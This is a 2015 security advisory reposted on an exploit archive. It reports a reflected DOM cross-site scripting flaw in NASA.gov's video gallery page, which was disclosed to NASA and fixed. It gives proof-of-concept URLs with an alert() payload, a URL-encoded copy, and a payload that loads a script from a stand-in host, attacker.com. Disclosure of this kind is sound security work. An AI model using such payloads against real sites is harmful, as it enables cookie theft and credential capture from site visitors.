NASA.gov Cross Site Scripting

NASA.gov Cross Site Scripting: Posted Apr 1, 2015; Authored by Yann CAM; NASA.gov suffered from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 1940dedc996e0a901e36e9ad94a1152f1b3844fb6cf1697bc6d72173b54ec02d; Download | Favorite | View

NASA.gov Cross Site Scripting

######################################################################
# Exploit Title: NASA.gov main-domain DOM-XSS
# Date: 01/04/2015
# Author: Yann CAM - Georges TAUPIN @ Synetis - ASafety
# Vendor or Software Link: www.nasa.gov
# Version: /
# Category: DOM-XSS
# Google dork:
# Tested on: NASA.gov main-domain
######################################################################

NASA description :
=======================================================================================
 
The National Aeronautics and Space Administration (NASA) is the United States government agency responsible for the civilian space program as well as 
aeronautics and aerospace research.

There are several sub-domains and independent projects within NASA.
Those affected by this advisory are :

- NASA’s video gallery on main domain : DOM Cross-Site Scripting (RXSS)


Vulnerability description :
=======================================================================================
Reflected DOM XSS are available in nasa.gov main-domain above.
Through this kind of vulnerability, an attacker could tamper with page rendering, redirect victims to fake NASA portals, or capture NASA's users credentials such cookies. 
These reflected XSS are on GET variables and are not properly sanitized before being used in page.


NASA’s main portal - video gallery - PoC :
=======================================================================================

- Proof of Concept (PoC), canonical DOM-XSS "alert()", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3Dalert(/RXSS/) />

or the same fully-url-encoded :

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%2f%52%58%53%53%2f%29%20%2f%3e

The previous link generates a JavaScript "alert()" box in the browser context.

- Proof of Concept (PoC), canonical DOM-XSS "loading third party JS script", tested on Firefox 35, Chrome 39 and IE 11:

http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param&_id&_title=<img src%3Dx onerror%3D"var s%3Ddocument.createElement('script');s.setAttribute('src','http://attacker.com/x.js');document.getElementsByTagName('head').item(0).appendChild(s);" />


Screenshots :
=======================================================================================
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_001.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_003.png
- http://www.asafety.fr/data/20150124-NASA.gov-RXSS_004.png


Solution:
=======================================================================================

Fixed by NASA Portal's team.
 
 
Additional resources :
=======================================================================================
 
- http://www.nasa.gov/
- https://www.owasp.org/index.php/DOM_Based_XSS
- http://www.asafety.fr/vuln-exploit-poc/contribution-nasa-gov-portail-principal-dom-xss
- http://www.synetis.com

 
Report timeline :
=======================================================================================
 
2015-01-25 : NASA Portal's team was alerted by email through "contact form".
2015-01-26 : NASA Portal's team fixed the vulnerability
2015-04-01 : Public advisory

Credits :
=======================================================================================
 
    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security
 
Yann CAM - Georges TAUPIN - Security Consultants @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr | www.georgestaupin.com

Top Authors In Last 30 Days

Red Hat 305 files
Ubuntu 67 files
Debian 23 files
Gentoo 8 files
LiquidWorm 6 files
Apple 5 files
Google Security Research 5 files
Spencer McIntyre 3 files
Ivan Fratric 3 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

NASA.gov Cross Site Scripting

NASA.gov Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

NASA.gov Cross Site Scripting

Share This

NASA.gov Cross Site Scripting

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems